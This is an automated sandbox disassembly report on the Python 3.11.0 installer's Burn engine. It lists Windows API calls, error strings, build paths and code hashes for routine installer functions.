                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 004AD7EA
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004AD82F
                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?), ref: 004AD843
                                                                                                                                  Strings
                                                                                                                                  • Failed to get state during job modification., xrefs: 004AD803
                                                                                                                                  • Failure while sending progress during BITS job modification., xrefs: 004AD81E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                                                                  • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                                                                                  • API String ID: 3094578987-1258544340
                                                                                                                                  • Opcode ID: 6989dc0348e9a19ef7a6118523d1503fe3a7578d8dfd9703633d199a66bb3e6b
                                                                                                                                  • Instruction ID: 99905df4bfbf17b115f40578bc734b2979c8a54450905314820032e86a26f015
                                                                                                                                  • Opcode Fuzzy Hash: 6989dc0348e9a19ef7a6118523d1503fe3a7578d8dfd9703633d199a66bb3e6b
                                                                                                                                  • Instruction Fuzzy Hash: AA01F572E01615FFCB12AF52C849E5EB7ACFF15325B10012EE426A7600D77CF90486D8
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,004ADD15,?,?,?,?,?,00000000,00000000,?), ref: 004AD5D7
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,004ADD15,?,?,?,?,?,00000000,00000000,?), ref: 004AD5E2
                                                                                                                                  • GetLastError.KERNEL32(?,004ADD15,?,?,?,?,?,00000000,00000000,?), ref: 004AD5EF
                                                                                                                                  Strings
                                                                                                                                  • Failed to create BITS job complete event., xrefs: 004AD61D
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\bitsengine.cpp, xrefs: 004AD613
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                                                                                  • String ID: Failed to create BITS job complete event.$c:\agent\_work\138\s\src\burn\engine\bitsengine.cpp
                                                                                                                                  • API String ID: 3069647169-77904838
                                                                                                                                  • Opcode ID: e2f72e4b8f5be7f9912a03c2c5f45864106c8cedc899517162ce99e163e1491b
                                                                                                                                  • Instruction ID: 0fcf53917cf7d86680a4bb448e1cfb31f04dda21753b8d289499fe16ea77d82d
                                                                                                                                  • Opcode Fuzzy Hash: e2f72e4b8f5be7f9912a03c2c5f45864106c8cedc899517162ce99e163e1491b
                                                                                                                                  • Instruction Fuzzy Hash: FC017576941622ABC3109F5AD805A87BF98FF16761B014127FD19D7A40D774D8508BEC
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,004ADBB3), ref: 004ADA5B
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000008,?,004ADBB3), ref: 004ADAA0
                                                                                                                                  • SetEvent.KERNEL32(?,?,004ADBB3), ref: 004ADAB4
                                                                                                                                  Strings
                                                                                                                                  • Failed to get BITS job state., xrefs: 004ADA74
                                                                                                                                  • Failure while sending progress., xrefs: 004ADA8F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                                                                  • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                                                                                                  • API String ID: 3094578987-2876445054
                                                                                                                                  • Opcode ID: 1c78a6a61aee5177867fc3560391f284bd992d4212ae68f4def1110576607ac2
                                                                                                                                  • Instruction ID: ccf998652089e0456b83dcd467f903503b120e109bcdc63fd95268331ff07c98
                                                                                                                                  • Opcode Fuzzy Hash: 1c78a6a61aee5177867fc3560391f284bd992d4212ae68f4def1110576607ac2
                                                                                                                                  • Instruction Fuzzy Hash: 9D01F1B2A00621ABC712DB56C849E5EBBACFF25321B00025BE40693A10CB78ED4486DC
                                                                                                                                  APIs
                                                                                                                                  • ControlService.ADVAPI32(yiJ,00000001,?,00000001,00000000,?,?,?,?,?,?,004A6979,00000000), ref: 004A6A8D
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,004A6979,00000000), ref: 004A6A97
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ControlErrorLastService
                                                                                                                                  • String ID: Failed to stop wusa service.$c:\agent\_work\138\s\src\burn\engine\msuengine.cpp$yiJ
                                                                                                                                  • API String ID: 4114567744-3628854371
                                                                                                                                  • Opcode ID: 3488c531087e63c48916fa650a3ff02f19362f83a84e051571994375ec5ba27b
                                                                                                                                  • Instruction ID: 24c8de1d7ecaa0daaa87cec0bbc8f6a90e879915fa360eefa26054310a1df75c
                                                                                                                                  • Opcode Fuzzy Hash: 3488c531087e63c48916fa650a3ff02f19362f83a84e051571994375ec5ba27b
                                                                                                                                  • Instruction Fuzzy Hash: B901D033B40634A7D7109B659C06F9F7794EF55714F01403BFD05BB280DA689D0045DC
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 004C214F
                                                                                                                                  • GetLastError.KERNEL32(?,00484A5C,00000001,?,?,004845D9,?,?,?,?,004854DE,?,?,?,?), ref: 004C215E
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\srputil.cpp, xrefs: 004C217F
                                                                                                                                  • SRSetRestorePointW, xrefs: 004C2144
                                                                                                                                  • srclient.dll, xrefs: 004C212D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                  • String ID: SRSetRestorePointW$c:\agent\_work\138\s\src\libs\dutil\srputil.cpp$srclient.dll
                                                                                                                                  • API String ID: 199729137-976246835
                                                                                                                                  • Opcode ID: 243e89d73bbcbf19266fe34117cac33aa7b225308db62b8e963f87577cfdfce0
                                                                                                                                  • Instruction ID: fd1e4ee6e6bb20560040e397de8eb4d7af6adec01a6c2ebcfe8e6eaec2a594ee
                                                                                                                                  • Opcode Fuzzy Hash: 243e89d73bbcbf19266fe34117cac33aa7b225308db62b8e963f87577cfdfce0
                                                                                                                                  • Instruction Fuzzy Hash: 3501673AE40773A3D26126969D46F5A29509B10BA1F1A013FBF00AA351DEED8C4086DD
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 004B4935
                                                                                                                                  • _free.LIBCMT ref: 004B4955
                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004B49B6
                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004B49C8
                                                                                                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004B49D5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __crt_fast_encode_pointer$_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 366466260-0
                                                                                                                                  • Opcode ID: e97cb4c5a42b98c0a1dae1a16b02aad7963b786ff579d11ff3129c85b1622c2c
                                                                                                                                  • Instruction ID: b23efeb4dc12f1d149f957855e4a07736eefca8bf0c21a23aa6407d7bc562948
                                                                                                                                  • Opcode Fuzzy Hash: e97cb4c5a42b98c0a1dae1a16b02aad7963b786ff579d11ff3129c85b1622c2c
                                                                                                                                  • Instruction Fuzzy Hash: 1641C376A002049BCB10DFB9C881A9FB3B6EFC9714B1544AEE555EB382D735ED01CB94
                                                                                                                                  APIs
                                                                                                                                  • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00482326
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00482332
                                                                                                                                    • Part of subcall function 00483C9A: GetProcessHeap.KERNEL32(00000000,000001C7,?,00482300,000001C7,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483CA2
                                                                                                                                    • Part of subcall function 00483C9A: HeapSize.KERNEL32(00000000,?,00482300,000001C7,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483CA9
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\strutil.cpp, xrefs: 00482356
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\strutil.cpp
                                                                                                                                  • API String ID: 3662877508-1498286024
                                                                                                                                  • Opcode ID: b98e448dd87799ab426d7883d90d5064c642e8ef811adb2fbb9963b8fc4aace2
                                                                                                                                  • Instruction ID: d838e6b52428c6262aa19d5fde7c0f97d5df730e767ffbba874d95ca4c36a64b
                                                                                                                                  • Opcode Fuzzy Hash: b98e448dd87799ab426d7883d90d5064c642e8ef811adb2fbb9963b8fc4aace2
                                                                                                                                  • Instruction Fuzzy Hash: CF31F932500225ABC720AE75CE54A6F3B55EF05764B114A37FC15AB390DBBCCC4197E9
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00488C96,004897E5,?,004897E5,?,?,004897E5,?,?), ref: 00488AF7
                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00488C96,004897E5,?,004897E5,?,?,004897E5,?,?), ref: 00488AFF
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00488C96,004897E5,?,004897E5,?), ref: 00488B4E
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00488C96,004897E5,?,004897E5,?), ref: 00488BB0
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00488C96,004897E5,?,004897E5,?), ref: 00488BDD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1657112622-0
                                                                                                                                  • Opcode ID: 721b3f3348a70b0cc5e29c40fc100e6eac756da8763622a1559742289c7771d6
                                                                                                                                  • Instruction ID: d6535b41e61a9637a03c7ddb486dcbba2e223b3d378a457c42a8866352fbd794
                                                                                                                                  • Opcode Fuzzy Hash: 721b3f3348a70b0cc5e29c40fc100e6eac756da8763622a1559742289c7771d6
                                                                                                                                  • Instruction Fuzzy Hash: 7B319772601108FFCF11AF59CC459AF3F66EB84394F54481EF91987211CA39AD90DBA5
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(?,WixBundleOriginalSource,?,?,0049A611,004CB478,WixBundleOriginalSource,?,004EBB6C,?,00000000,?,00000001,?,?,?), ref: 00487571
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,0049A611,004CB478,WixBundleOriginalSource,?,004EBB6C,?,00000000,?,00000001,?), ref: 004875D8
                                                                                                                                  Strings
                                                                                                                                  • WixBundleOriginalSource, xrefs: 0048756D
                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 004875C7
                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 004875AB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                  • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                                                                                  • API String ID: 3168844106-30613933
                                                                                                                                  • Opcode ID: 223535f6ca9d058ae468983e0d3dc10ddc2870b791411e806cca0c97b907f3f1
                                                                                                                                  • Instruction ID: e4d76d5fdf639eb308491be55d51c225771415f67dae1cc14fad766230191264
                                                                                                                                  • Opcode Fuzzy Hash: 223535f6ca9d058ae468983e0d3dc10ddc2870b791411e806cca0c97b907f3f1
                                                                                                                                  • Instruction Fuzzy Hash: 8D019A32904128FBCF12AB50CC19F9E3A64AF14364F208426FC04AA660C73ADE109BD8
                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 004B8951
                                                                                                                                    • Part of subcall function 004B604F: HeapFree.KERNEL32(00000000,00000000,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?), ref: 004B6065
                                                                                                                                    • Part of subcall function 004B604F: GetLastError.KERNEL32(?,?,004B89CC,?,00000000,?,00000000,?,004B89F3,?,00000007,?,?,004B8E6D,?,?), ref: 004B6077
                                                                                                                                  • _free.LIBCMT ref: 004B8963
                                                                                                                                  • _free.LIBCMT ref: 004B8975
                                                                                                                                  • _free.LIBCMT ref: 004B8987
                                                                                                                                  • _free.LIBCMT ref: 004B8999
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 2868766b9a418ca6a34666b9d5d4b154b4a44a6bf6d3a0cfd194ebcc30bb1126
                                                                                                                                  • Instruction ID: 6b1f10fba4e8ca53142c753529706ea38561c667c1866466aebef48ff27f58e5
                                                                                                                                  • Opcode Fuzzy Hash: 2868766b9a418ca6a34666b9d5d4b154b4a44a6bf6d3a0cfd194ebcc30bb1126
                                                                                                                                  • Instruction Fuzzy Hash: 3CF0E172504644A78A30EB5AE5C1CA777EDEB80B10755181FF548DB653CB2CFC8086BD
                                                                                                                                  APIs
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 004C8BFD
                                                                                                                                  • GetLastError.KERNEL32 ref: 004C8C07
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$ErrorFileLastSystem
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\timeutil.cpp$clbcatq.dll
                                                                                                                                  • API String ID: 2781989572-1116151388
                                                                                                                                  • Opcode ID: 5817b937421d9aba253eb92b6291fad9e7638052684c306be4ae9e725c590302
                                                                                                                                  • Instruction ID: 97243327925dba2aedfa6bc1f7b1ab71fc65be5a249a809cfef31d378014d44b
                                                                                                                                  • Opcode Fuzzy Hash: 5817b937421d9aba253eb92b6291fad9e7638052684c306be4ae9e725c590302
                                                                                                                                  • Instruction Fuzzy Hash: 4841D3B9E002066AD764AFB98C45FBF6674AF41714F05442FB901BB281E93CEE0187A9
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe, xrefs: 004B3DAD, 004B3DB4, 004B3DE8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exe
                                                                                                                                  • API String ID: 0-452057521
                                                                                                                                  • Opcode ID: 067f08e2b76e5b848462253976db5ca7bae57869674f893a64ba1b627ad69289
                                                                                                                                  • Instruction ID: 2e92a1a11b76396fb29c59e76acec2de7ac8cfa01c3faf850f931fffc8c14829
                                                                                                                                  • Opcode Fuzzy Hash: 067f08e2b76e5b848462253976db5ca7bae57869674f893a64ba1b627ad69289
                                                                                                                                  • Instruction Fuzzy Hash: EA415171A04214ABCB21DF9B9C85DEFBBBCEB89715B10006BE50497251E7749F41CBA8
                                                                                                                                  APIs
                                                                                                                                  • VariantInit.OLEAUT32(000002C0), ref: 004C3B59
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004C3B69
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 004C3C48
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp, xrefs: 004C3B81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$AllocClearInitString
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\xmlutil.cpp
                                                                                                                                  • API String ID: 2213243845-3319182157
                                                                                                                                  • Opcode ID: 8b73f65f67f03038f95af580c73303ee6b0fbf67d04f13c555c1fc125e4ded1c
                                                                                                                                  • Instruction ID: 81a8ab1d3f9b973b614a7cce188dfb2f2a941a485d2ac160bf266c771728426d
                                                                                                                                  • Opcode Fuzzy Hash: 8b73f65f67f03038f95af580c73303ee6b0fbf67d04f13c555c1fc125e4ded1c
                                                                                                                                  • Instruction Fuzzy Hash: 80419676900265ABCB51DFA5C888FAFBBB8AF05711F0581A9FC01EB215D638DE00CB95
                                                                                                                                  APIs
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,004A8C68), ref: 004C1376
                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,004A8C68,00000000), ref: 004C1394
                                                                                                                                  • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,004A8C68,00000000,00000000,00000000), ref: 004C13EA
                                                                                                                                  Strings
                                                                                                                                  • c:\agent\_work\138\s\src\libs\dutil\regutil.cpp, xrefs: 004C13BA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Enum$InfoQuery
                                                                                                                                  • String ID: c:\agent\_work\138\s\src\libs\dutil\regutil.cpp
                                                                                                                                  • API String ID: 73471667-3069916640
                                                                                                                                  • Opcode ID: 99f5a80a507d121fcdb0e035ba4ee81db2a41c2c0b2a53b1b62c4c4a249b6034
                                                                                                                                  • Instruction ID: 133122629d6a7a1ce573e169e5bc4aa6ae9d14bf00e811d2243fb3c5ed5fd5f5
                                                                                                                                  • Opcode Fuzzy Hash: 99f5a80a507d121fcdb0e035ba4ee81db2a41c2c0b2a53b1b62c4c4a249b6034
                                                                                                                                  • Instruction Fuzzy Hash: 2931CABA901165FBEB119A85CD80FBFB66CEF05754F11406BFD01A7231D7388E019BA8
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C9213: lstrlenW.KERNEL32(00000100,?,?,?,004C95B3,000002C0,00000100,00000100,00000100,?,?,?,004A7BE4,?,?,000001BC), ref: 004C9238
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,crypt32.dll,00000000,00000000,00000000,00000000,crypt32.dll), ref: 004C981B
                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000000,crypt32.dll,00000000,00000000,00000000,00000000,crypt32.dll), ref: 004C9835
